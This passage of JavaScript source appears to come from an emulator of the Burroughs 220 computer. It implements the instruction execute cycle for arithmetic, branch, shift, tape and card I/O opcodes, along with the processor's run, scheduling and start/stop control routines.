(should set IB sign bit 1=0 here, but to reduce overhead we don't bother) this.fetchWordToC(word); this.D.set(word); // D contains a copy of memory word if (!entryP && !this.PCOUNTSW) { this.P.inc(); // if not doing I/O, bump the program counter } } // if we're not locked in Fetch, switch to Execute cycle next. if (!this.FETCHEXECUTELOCKSW) { this.EXT.set(1); } this.execClock += 0.090; // fetch uniformly requires 90 us }; /*********************************************************************** * Execute Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.execute = function execute() { /* Implements the Execute cycle of the 220 processor. This is initiated either by pressing START on the console with the EXT=1 (Execute), or by the prior Operation Complete if the processor is in automatic mode */ var d; // scratch digit var w; // scratch word var x; // scratch variable or counter w = this.C.value; this.CCONTROL = (w - w%0x1000000)/0x1000000; // C register control digits this.COP = (w%0x1000000 - w%0x10000)/0x10000; // C register operation code this.CADDR = w%0x10000; // C register operand address this.opTime = 0; // clear the current instruction timer ++this.instructionCount; if (this.OFT.value && this.HCT.value && this.COP != 0x31) { this.setStop(); // if overflow and SOH and instruction is not BOF, stop return; // do not go through Operation Complete } this.E.set(0); this.IB.set(0); switch (this.COP) { case 0x00: //--------------------- HLT Halt this.setStop(); this.opTime = 0.010; this.operationComplete(); break; case 0x01: //--------------------- NOP No operation this.opTime = 0.010; this.operationComplete(); break; case 0x03: //--------------------- PRD Paper tape read this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = this.CCONTROL%0x10; this.sDigit = 1; // use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x04: //--------------------- PRB Paper tape read, branch this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = (this.CCONTROL & 0x0E) | 1; // force recognition of control words this.sDigit = 0; // do not use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x05: //--------------------- PRI Paper tape read, inverse format this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = (this.CCONTROL & 0x0E) | 1; // force recognition of control words this.sDigit = 1; // use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateInverse); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x06: //--------------------- PWR Paper tape write this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.ioInitiate(); d = this.console.outputUnitSelect(d, this.boundConsoleOutputSign); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x07: //--------------------- PWI Paper tape write interrogate, branch d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; d = this.console.outputUnitSelect(d, B220Processor.emptyFunction); if (d < 0) { // if not ready, continue in sequence this.opTime = 0.015; } else { // if ready, branch to operand address this.P.set(this.CADDR); this.opTime = 0.035; } this.operationComplete(); break; case 0x08: //--------------------- KAD Keyboard add this.opTime = 0.005; this.D.set(0); this.setStop(); this.operationComplete(); break; case 0x09: //--------------------- SPO Supervisory print-out this.opTime = 0.185; // just a guess... this.ioInitiate(); d = this.console.outputUnitSelect(0, this.boundConsoleOutputSign); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x10: //--------------------- CAD/CAA Clear add/add absolute this.SUT.set(0); this.clearAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x11: //--------------------- CSU/CSA Clear subtract/subtract absolute this.SUT.set(1); this.clearAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x12: //--------------------- ADD/ADA Add/add absolute this.SUT.set(0); this.integerAdd(this.CCONTROL % 0x10 == 1, false); this.operationComplete(); break; case 0x13: //--------------------- SUB/SUA Subtract/subtract absolute this.SUT.set(1); this.integerAdd(this.CCONTROL % 0x10 == 1, false); this.operationComplete(); break; case 0x14: //--------------------- MUL Multiply this.integerMultiply(); this.operationComplete(); break; case 0x15: //--------------------- DIV Divide this.integerDivide(); this.operationComplete(); break; case 0x16: //--------------------- RND Round this.opTime = 0.015; // minimum instruction timing this.SUT.set(0); w = this.A.value%0x10000000000; this.SGT.set(((this.A.value - w)/0x10000000000)%2); if (this.R.value%0x10000000000 >= 0x5000000000) { // Add round-off (as the carry bit) to absolute value of A. this.A.value -= w; // preserve the A sign digit w = this.bcdAdd(w, 0, 11, 0, 1); if (w >= 0x10000000000) { this.OFT.set(1); // overflow occurred w -= 0x10000000000; // remove the overflow bit from A } this.A.set(this.A.value + w); // restore the A sign digit this.opTime += 0.060; // account for add cycle } this.R.set(0); // unconditionally clear R this.operationComplete(); break; case 0x17: //--------------------- EXT Extract this.integerExtract(); this.operationComplete(); break; case 0x18: //--------------------- CFA/CFR Compare field A/R this.compareField(); this.operationComplete(); break; case 0x19: //--------------------- ADL Add to location this.SUT.set(0); this.integerAdd(false, true); // result to D register this.IB.set(this.D.value); this.writeMemory(); // E still contains the operand address this.opTime += 0.70; // additional time over standard ADD this.operationComplete(); break; case 0x20: //--------------------- IBB Increase B, branch w = this.B.value; this.B.add(this.CCONTROL); if (this.B.value < w) { this.opTime = 0.040; } else { this.P.set(this.CADDR); this.opTime = 0.060; } this.operationComplete(); break; case 0x21: //--------------------- DBB Decrease B, branch w = this.B.value; this.B.sub(this.CCONTROL); if (this.B.value > w) { this.opTime = 0.040; } else { this.P.set(this.CADDR); this.opTime = 0.060; } this.operationComplete(); break; case 0x22: //--------------------- FAD/FAA Floating add/add absolute this.SUT.set(0); this.floatingAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x23: //--------------------- FSU/FSA Floating subtract/subtract absolute this.SUT.set(1); this.floatingAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x24: //--------------------- FMU Floating multiply this.floatingMultiply(); this.operationComplete(); break; case 0x25: //--------------------- FDV Floating divide this.floatingDivide(0); this.operationComplete(); break; case 0x26: //--------------------- IFL Increase field location this.increaseFieldLocation(); this.operationComplete(); break; case 0x27: //--------------------- DFL Decrease field location this.decreaseFieldLocation(false); this.operationComplete(); break; case 0x28: //--------------------- DLB Decrease field location, load B this.decreaseFieldLocation(true); this.operationComplete(); break; case 0x29: //--------------------- RTF Record transfer this.opTime = 0.040; do { d = this.bcdAdd(this.CCONTROL, 0x990, 3); // decrement word count this.CCONTROL += d - this.CCONTROL%0x1000; this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); // increment source address this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address break; // out of do loop } else { this.E.set(this.B.value); this.B.inc(); // increment destination address this.opTime += 0.060; this.writeMemory(); if (this.MET.value) { break; // out of do loop } } } while (this.CCONTROL%0x1000 > 0x00F); this.operationComplete(); break; case 0x30: //--------------------- BUN Branch, unconditionally this.opTime = 0.035; this.P.set(this.CADDR); this.operationComplete(); break; case 0x31: //--------------------- BOF Branch, overflow this.opTime = 0.015; if (this.OFT.value) { this.P.set(this.CADDR); this.OFT.set(0); this.opTime += 0.020; } this.operationComplete(); break; case 0x32: //--------------------- BRP Branch, repeat this.opTime = 0.015; if (this.RPT.value) { this.P.set(this.CADDR); this.RPT.set(0); this.opTime += 0.020; } this.operationComplete(); break; case 0x33: //--------------------- BSA Branch, sign A this.opTime = 0.085; this.SUT.set(1); if ((this.A.value - this.A.value%0x10000000000)/0x10000000000 == this.CCONTROL%0x10) { this.P.set(this.CADDR); this.opTime += 0.020; } this.operationComplete(); break; case 0x34: //--------------------- BCH/BCL Branch, comparison high/low this.opTime = 0.015; if (this.UET.value) { if (this.HIT.value) { // HIGH condition if (this.CCONTROL%0x10 != 1) { // BCH -- test for high condition this.P.set(this.CADDR); this.opTime += 0.020; } } else { // LOW condition if (this.CCONTROL%0x10 == 1) { // BCL -- test for low condition this.P.set(this.CADDR); this.opTime += 0.020; } } } else { if (this.HIT.value) { // EQUAL condition // continue in sequence } else { // no condition is set this.setProgramCheck(1); } } this.operationComplete(); break; case 0x35: //--------------------- BCE/BCU Branch, comparison equal/unequal this.opTime = 0.015; if (this.UET.value) { // UNEQUAL condition if (this.CCONTROL%0x10 == 1) { // BCU -- test for unequal condition this.P.set(this.CADDR); this.opTime += 0.020; } else { // continue in sequence } } else { if (this.HIT.value) { // EQUAL condition if (this.CCONTROL%0x10 != 1) { // BCE -- test for equal condition this.P.set(this.CADDR); this.opTime += 0.020; } } else { // no condition is set this.setProgramCheck(1); } } this.operationComplete(); break; case 0x36: //--------------------- BFA Branch, field A this.branchField(this.A.value); this.operationComplete(); break; case 0x37: //--------------------- BFR Branch, field R this.branchField(this.R.value); this.operationComplete(); break; case 0x38: //--------------------- BCS Branch, control switch this.opTime = 0.015; // minimum instruction timing d = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; if (this["PC" + d.toString() + "SW"]) { this.opTime += 0.020; this.P.set(this.CADDR); } this.operationComplete(); break; case 0x39: //--------------------- SOR/SOH/IOM Set overflow remember/halt, Interrogate overflow mode // Note: it's not clear what should happen if the variant digit (41) is // other than 0, 1, or 2. We assume the digit is used as a bit mask. this.opTime = 0.015; switch (true) { case (this.CCONTROL & 0x02) == 0x02: // IOM: Interrogate overflow mode if (this.HCT.value) { this.P.set(this.CADDR); this.opTime += 0.020; } break; case (this.CCONTROL & 0x01) == 0x01: // SOH: Set overflow halt this.HCT.set(1); if (this.OFT.value) { this.setStop(); } break; default: // SOR: Set overflow remember this.HCT.set(0); break; } this.operationComplete(); break; case 0x40: //--------------------- ST* Store A/R/B this.storeRegister(); this.operationComplete(); break; case 0x41: //--------------------- LDR Load R this.opTime = 0.085; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.D.set(this.IB.value); this.R.set(this.IB.value); } this.operationComplete(); break; case 0x42: //--------------------- LDB/LBC Load B/B complement this.opTime = 0.090; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.D.set(this.IB.value); if (this.CCONTROL%0x10 == 1) { // Load B complement this.B.set(this.bcdAdd(this.IB.value, 0, 4, 1, 1)); } else { // Load B this.B.set(this.IB.value%0x10000); } } this.operationComplete(); break; case 0x43: //--------------------- LSA Load sign A this.opTime = 0.015 this.A.set(this.A.value%0x10000000000 + (this.CCONTROL%0x10)*0x10000000000); this.operationComplete(); break; case 0x44: //--------------------- STP Store P this.opTime = 0.095; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.IB.set(this.IB.value - this.IB.value%0x10000 + this.bcdAdd(this.P.value, 1, 4)); this.D.set(this.IB.value); this.writeMemory(); } this.operationComplete(); break; case 0x45: //--------------------- CL* Clear A/R/B this.opTime = 0.010; if (this.CCONTROL & 0x01) { this.A.set(0); } if (this.CCONTROL & 0x02) { this.R.set(0); } if (this.CCONTROL & 0x04) { this.B.set(0); } this.operationComplete(); break; case 0x46: //--------------------- CLL Clear location this.opTime = 0.025; this.E.set(this.CADDR); this.writeMemory(); // IB is still zero this.operationComplete(); break; case 0x48: //--------------------- SR* Shift right A/A and R/A with sign x = B220Processor.bcdBinary(this.CADDR % 0x20); this.opTime = 0.020 + x*0.005; this.DC.set(B220Processor.binaryBCD(20-x)); switch (this.CCONTROL%0x10) { case 1: // SRT: Shift Right A and R w = this.A.value % 0x10000000000; // A sign is not affected this.R.value %= 0x10000000000; // discard the R sign while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.R.value = (this.R.value - this.R.value%0x10)/0x10 + d*0x1000000000; this.DC.inc(); } this.R.set(this.A.value - this.A.value%0x10000000000 + this.R.value); // copy A sign into R this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; case 2: // SRS: Shift Right A with Sign w = this.A.value % 0x100000000000; // A sign is included while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.DC.inc(); } this.A.set(w); break; default: // SRA: Shift Right A w = this.A.value % 0x10000000000; // A sign is not affected while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.DC.inc(); } this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; } // switch on control digit this.operationComplete(); break; case 0x49: //--------------------- SL* Shift (rotate) left A/A and R/A with sign switch (this.CCONTROL%0x10) { case 1: // SLT: Shift Left A and R x = this.CADDR % 0x20; this.opTime = 0.210 - x*0.005; this.DC.set(x); w = this.R.value % 0x10000000000; // the R sign is not affected this.A.value %= 0x10000000000; // discard the A sign for now while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + (this.A.value%0x10)*0x1000000000; this.A.value = (this.A.value - this.A.value%0x10)/0x10 + d*0x1000000000; this.DC.inc(); } this.A.set(this.R.value - this.R.value%0x10000000000 + this.A.value); // copy R sign into A this.R.set(this.R.value - this.R.value%0x10000000000 + w); // restore the R sign break; case 2: // SLS: Shift Left A with Sign w = this.A.value % 0x100000000000; // the A sign is included in the rotate d = w % 0x10; // always do one more rotate right w = (w-d)/0x10 + d*0x10000000000; // than the count calls for x = this.CADDR % 0x20; if (x >= 0x10) { x -= 0x10; // if the count is at least 10 d = w % 0x10; // do one additional rotate right w = (w-d)/0x10 + d*0x10000000000; } this.opTime = 0.160 - x*0.005; this.DC.set(0x10+x); while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + d*0x10000000000; this.DC.inc(); } this.A.set(w); break; default: // SLA: Shift Left A x = this.CADDR % 0x10; this.opTime = 0.160 - x*0.005; this.DC.set(0x10+x); w = this.A.value % 0x10000000000; // discard the A sign for now while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + d*0x1000000000; this.DC.inc(); } this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; } // switch on control digit this.operationComplete(); break; case 0x50: //--------------------- MTS/MFS/MLS/MRW/MDA Magnetic tape search/field search/lane select/rewind this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; this.ioInitiate(); if (this.vDigit & 0x08) { // MRW/MDA: rewind, with or without lockout this.magTape.rewind(this.D.value); } else if (this.vDigit & 0x04) { // MLS: lane select this.magTape.laneSelect(this.D.value); } else { // MTS/MFS: search or field search if (this.D.value%0x80000000000 < 0x40000000000) { // sign 4-bit = 0: full-word search this.magTape.search(this.D.value, 0); } else { // partial-word search based on sL00 in B this.magTape.search(this.D.value, this.B.value); } } } break; case 0x51: //--------------------- MTC/MFC Magnetic tape scan/field scan this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); if (this.D.value%0x80000000000 < 0x40000000000) { // sign 4-bit = 0: full-word search this.magTape.scan(this.D.value, 0); } else { // partial-word search based on sL00 in B this.magTape.scan(this.D.value, this.B.value); } } break; case 0x52: //--------------------- MRD Magnetic tape read this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; // controlword and B-mod bits this.ioInitiate(); this.magTape.read(this.D.value, false); } break; case 0x53: //--------------------- MRR Magnetic tape read, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; // controlword and B-mod bits this.ioInitiate(); this.magTape.read(this.D.value, true); } break; case 0x54: //--------------------- MIW Magnetic tape initial write this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.initialWrite(this.D.value, false); } break; case 0x55: //--------------------- MIR Magnetic tape initial write, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.initialWrite(this.D.value, true); } break; case 0x56: //--------------------- MOW Magnetic tape overwrite this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.overwrite(this.D.value, false); } break; case 0x57: //--------------------- MOR Magnetic tape overwrite, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); this.magTape.overwrite(this.D.value, true); } break; case 0x58: //--------------------- MPF/MPB/MIE Magnetic tape position forward/backward/at end this.opTime = 0.130; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); switch (this.CCONTROL%0x10) { case 1: // MPB: position tape backward this.magTape.positionBackward(this.D.value); break; case 2: // MPE: position tape at end this.magTape.positionAtEnd(this.D.value); break; default: // MPF: position tape forward this.magTape.positionForward(this.D.value); break; } // switch on operation variant } break; case 0x59: //--------------------- MIB/MIE Magnetic tape interrogate, branch/end of tape, branch if (!this.magTape) { this.opTime = 0.01; } else if (this.magTape.controlBusy) { this.opTime = 0.01; } else { this.opTime = 0.14; if (this.CCONTROL%0x10 == 1) { // MIE if (this.magTape.testUnitAtEOT(this.D.value)) { this.P.set(this.CADDR); this.opTime += 0.020; } } else { // MIB if (this.magTape.testUnitReady(this.D.value)) { this.P.set(this.CADDR); this.opTime += 0.020; } } } this.operationComplete(); break; case 0x60: //--------------------- CRD Card read this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.vDigit = (this.CCONTROL >>> 4)%0x10; this.ioInitiate(); d = this.cardatron.inputInitiate(this.selectedUnit, this.rDigit, this.boundCardatronReceiveWord); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x61: //--------------------- CWR Card write this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.vDigit = (this.CCONTROL >>> 4)%0x10; this.ioInitiate(); d = this.cardatron.outputInitiate(this.selectedUnit, this.rDigit, this.vDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x62: //--------------------- CRF Card read, format load this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.ioInitiate(); d = this.cardatron.inputFormatInitiate(this.selectedUnit, this.rDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x63: //--------------------- CWF Card write, format load this.opTime = 1.600; // rough minimum estimage this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.rDigit = this.CCONTROL%0x10; this.ioInitiate(); d = this.cardatron.outputFormatInitiate(this.selectedUnit, this.rDigit, this.boundCardatronOutputWord, this.boundCardatronOutputFinished); if (d < 0) { // invalid unit this.setCardatronCheck(1); this.ioComplete(true); } } break; case 0x64: //--------------------- CRI Card read interrogate, branch this.opTime = 0.265; // average this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; d = this.cardatron.inputReadyInterrogate(this.selectedUnit); if (d < 0) { // invalid unit this.setCardatronCheck(1); } else if (d > 0) { this.opTime += 0.020; this.P.set(this.CADDR); } } this.operationComplete(); break; case 0x65: //--------------------- CWI Card write interrogate, branch this.opTime = 0.265; // average this.E.set(this.CADDR); this.D.set(0); if (!this.cardatron) { this.setCardatronCheck(1); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; d = this.cardatron.outputReadyInterrogate(this.selectedUnit); if (d < 0) { // invalid unit this.setCardatronCheck(1); } else if (d > 0) { this.opTime += 0.020; this.P.set(this.CADDR); } } this.operationComplete(); break; case 0x66: //--------------------- HPW High speed printer write this.setProgramCheck(1); this.operationComplete(); break; case 0x67: //--------------------- HPI High speed printer interrogate, branch this.setProgramCheck(1); this.operationComplete(); break; default: //--------------------- Invalid op code -- set Program Check alarm this.setProgramCheck(1); this.operationComplete(); break; } // switch this.COP }; /*********************************************************************** * Processor Run Control * ***********************************************************************/ /**************************************/ B220Processor.prototype.operationComplete = function operationComplete() { /* Implements Operation Complete for the Execute cycle. If we're not locked in Execute, switch to Fetch cycle next */ if (this.FETCHEXECUTELOCKSW != 1) { this.EXT.set(0); // set to FETCH state } this.execClock += this.opTime; if (this.ORDERCOMPLEMENTSW) { this.C.flipBit(16); // complement low order bit of op code this.COP ^= 0x01; } if (!this.RUT.value) { // halted this.stop(); } else if (this.SST.value) { this.stop(); // single-stepping } else if (this.SONSW) { if (this.STOCSW) { // check for post-execute S-to-C stop if (this.SUNITSSW) { if (this.C.value%0x10 == this.S.value%0x10) { this.stop(); } } else if (this.C.value%0x10000 == this.S.value) { this.stop(); } } } }; /**************************************/ B220Processor.prototype.ioComplete = function ioComplete(restart) { /* Implements completion of the Execute cycle for an I/O instruction that has been executing asynchronously. If "restart" is true, the Processor will resume automatic operation */ this.AST.set(0); this.asyncOff(); this.procOff(); this.operationComplete(); if (restart && this.RUT.value) { this.schedule(); } }; /**************************************/ B220Processor.prototype.ioInitiate = function ioInitiate() { /* Initiates asynchronous mode of the processor for I/O */ this.AST.set(1); this.asyncOn(); this.execLimit = 0; // kill the run() loop }; /**************************************/ B220Processor.prototype.traceState = function traceState() { /* Logs a subset of the Processor state to the Javascript console for debugging purposes */ console.log("P=" + B220Processor.padLeft(this.P.value.toString(16), 4) + " | B=" + B220Processor.padLeft(this.B.value.toString(16), 4) + " | C=" + B220Processor.formatWord(this.C.value).substring(2) + " | A=" + B220Processor.formatWord(this.A.value) + " | R=" + B220Processor.formatWord(this.R.value) + " | D=" + B220Processor.formatWord(this.D.value) + " | E=" + B220Processor.padLeft(this.E.value.toString(16), 4) + " | UET=" + this.UET.value + " | HIT=" + this.HIT.value + " | OFT=" + this.OFT.value + " | RPT=" + this.RPT.value); }; /**************************************/ B220Processor.prototype.run = function run() { /* Main execution control loop for the processor. Called from this.schedule() to initiate a time slice. Will continue fetch/execute cycles until the time slice expires, a stop condition is detected, or AST (asynchronous toggle) is set indicating the processor has been suspended during an I/O. This routine effectively implements Operation Complete (O.C.) for the Fetch and Execute cycles, although it is more of a "ready for next operation" function, determining if there is a stop condition, or whether to do a Fetch or Execute cycle next. The fetch() and execute() methods exit back here, and in most cases we simply step to the next cycle. In the case of asynchronous operation, however, we simply exit, and the I/O interface will call this.schedule() to restart execution again once memory transfers have completed */ this.execLimit = this.execClock + B220Processor.timeSlice; do { if (this.EXT.value) { // enter EXECUTE cycle this.execute(); } else { // enter FETCH cycle if (this.tracing) { this.traceState(); // DEBUG ONLY } if (this.SONSW) { // check for post-fetch S-to-P stop if (this.STOPSW) { // must check before P is incremented in fetch() if (this.SUNITSSW) { if (this.P.value%0x10 == this.S.value%0x10) { this.stop(); } } else if (this.P.value == this.S.value) { this.stop(); } } } this.fetch(false); if (this.SST.value) { this.stop(); // single-stepping } break; } } while (this.execClock < this.execLimit); }; /**************************************/ B220Processor.prototype.schedule = function schedule() { /* Schedules the next processor time slice and attempts to throttle performance to approximate that of a real B220. It establishes a time slice in terms of a number milliseconds each and calls run() to execute for at most that amount of time. run() counts up instruction times until it reaches this limit or some terminating event (such as a stop), then exits back here. If the processor remains active, this routine will reschedule itself after an appropriate delay, thereby throttling the performance and allowing other modules to share the single Javascript execution thread */ var delayTime = 0; // delay from/until next run() for this processor, ms var stamp = performance.now(); // ending time for the delay and the run() call, ms this.scheduler = 0; // If run() has been called by a throttling delay, compute the delay stats. if (this.delayLastStamp > 0) { delayTime = stamp - this.delayLastStamp; this.procSlack += delayTime; // Compute the exponential weighted average of scheduling delay deviation. this.delayDeltaAvg = (delayTime - this.delayRequested)*B220Processor.delayAlpha + this.delayDeltaAvg*B220Processor.delayAlpha1; this.procSlackAvg = delayTime*B220Processor.slackAlpha + this.procSlackAvg*B220Processor.slackAlpha1; } // Execute the time slice. this.runStamp = stamp; // starting clock time for time slice this.procOn(); // prepare to accumulate internal processor time this.run(); stamp = performance.now(); this.procRunAvg = (stamp - this.runStamp)*B220Processor.slackAlpha + this.procRunAvg*B220Processor.slackAlpha1; // Determine what to do next. this.runStamp = stamp; // DEBUG: for DiagMonitor use only. if (!this.RUT.value) { // Processor is stopped, just inhibit delay averaging on next call and exit. this.delayLastStamp = 0; this.procOff(); // accumulate internal processor time for the slice } else if (this.AST.value) { // Processor is idle during I/O, but still accumulating clocks, so no procOff(). this.delayLastStamp = 0; } else { this.procOff(); // accumulate internal processor time for the slice // The processor is still running, so schedule next time slice after a // throttling delay. delayTime is the number of milliseconds the // processor is running ahead of real-world time. Web browsers have a // certain minimum setTimeout() delay. If the delay is less than our // estimate of that minimum, setCallback() will yield to the event loop // but otherwise continue (real time should eventually catch up -- we // hope). If the delay is greater than the minimum, setCallback() will // reschedule us after that delay. delayTime = this.execClock - stamp; this.delayRequested = delayTime; this.delayLastStamp = stamp; this.scheduler = setCallback(this.mnemonic, this, delayTime, schedule); } }; /**************************************/ B220Processor.prototype.start = function start() { /* Initiates a time slice for the processor according to the EXT state */ var stamp = performance.now(); if (this.poweredOn && !this.RUT.value && !this.AST.value && !this.digitCheckAlarm.value && !this.ALT.value && !this.MET.value && !this.TAT.value && !this.CRT.value && !this.PAT.value && !this.HAT.value && !this.systemNotReady.value && !this.computerNotReady.value) { this.execClock = stamp; this.asyncTime = 0; this.delayLastStamp = 0; this.delayRequested = 0; this.RUT.set(1); // Start the processor timer while (this.procTimer >= 0) { this.procTimer -= stamp; } // Start the run timer while (this.runTimer >= 0) { this.runTimer -= stamp; } this.updateLampGlow(1); // freeze state in the lamps this.schedule(); } }; /**************************************/ B220Processor.prototype.stop = function stop() { /* Stops running the processor on the Javascript thread */ var stamp = performance.now(); if (this.poweredOn) { this.execLimit = 0; // kill the time slice this.SST.set(0); this.RUT.set(0); this.AST.set(0); // Stop the timers this.asyncOff(); this.procOff(); // Stop the run timer while (this.runTimer < 0) { this.runTimer += stamp; } // Stop the processor timer while (this.procTimer < 0) { this.procTimer += stamp; } this.updateLampGlow(1); // freeze state in the lamps if (this.scheduler) { clearCallback(this.scheduler); this.scheduler = 0; } } }; /**************************************/ B220Processor.prototype.step = function step() { /* Single-steps the processor. This will execute the next Fetch or Execute cycle only, then stop the processor */ if (this.poweredOn) { if (!this.RUT.value) { this.SST.set(1); this.start(); } } }; /**************************************/ B220Processor.prototype.setStop = function setStop() { /* Initiates a halt of the processor. The processor will execute through the end of the Execute cycle, then stop */ if (this.poweredOn) { if (this.RUT.value) { this.RUT.set(0); } else { this.stop(); } } }; /**************************************/ B220Processor.prototype.setCycle = function setCycle(cycle) { /* Sets the processor cycle to Fetch (0) or Execute (1) */ if (this.poweredOn) { if (!this.RUT.value) { this.EXT.set(cycle); } } }; /**************************************/ B220Processor.prototype.toggleCompareLamps = function toggleCompareLamps(condition) { /* Toggles the comparison lamps and sets the processor UET and HIT toggles according to the condition: <0=LOW, 0=EQUAL, >0=HIGH */ if (this.poweredOn) { if (condition < 0) { // LOW this.compareLowLamp.flip(); this.compareEqualLamp.set(0); this.compareHighLamp.set(0); this.UET.set(this.compareLowLamp.value); this.HIT.set(0); } else if (condition > 0) { // HIGH this.compareLowLamp.set(0); this.compareEqualLamp.set(0); this.compareHighLamp.flip(); this.UET.set(this.compareHighLamp.value); this.HIT.set(this.compareHighLamp.value); } else { // EQUAL this.compareLowLamp.set(0); this.compareEqualLamp.flip(); this.compareHighLamp.set(0); this.UET.set(0); this.HIT.set(this.compareEqualLamp.value); } } }; /**************************************/ B220Processor.prototype.resetRunTimer = function resetRunTimer() { /* Resets the elapsed run-time timer to zero */ if (this.poweredOn) { this.instructionCount = 0; if (this.runTimer < 0) { // it's running, adjust its bias this.runTimer = -performance.now(); } else { // it's stopped, just zero it this.runTimer = 0; } } }; /**************************************/ B220Processor.prototype.resetTransfer = function resetTransfer() { /* Initiates a Reset and Transfer operation, storing P in address 0000/04 and C in 0000/64, then branching to address 0001. Always active, even when running */ if 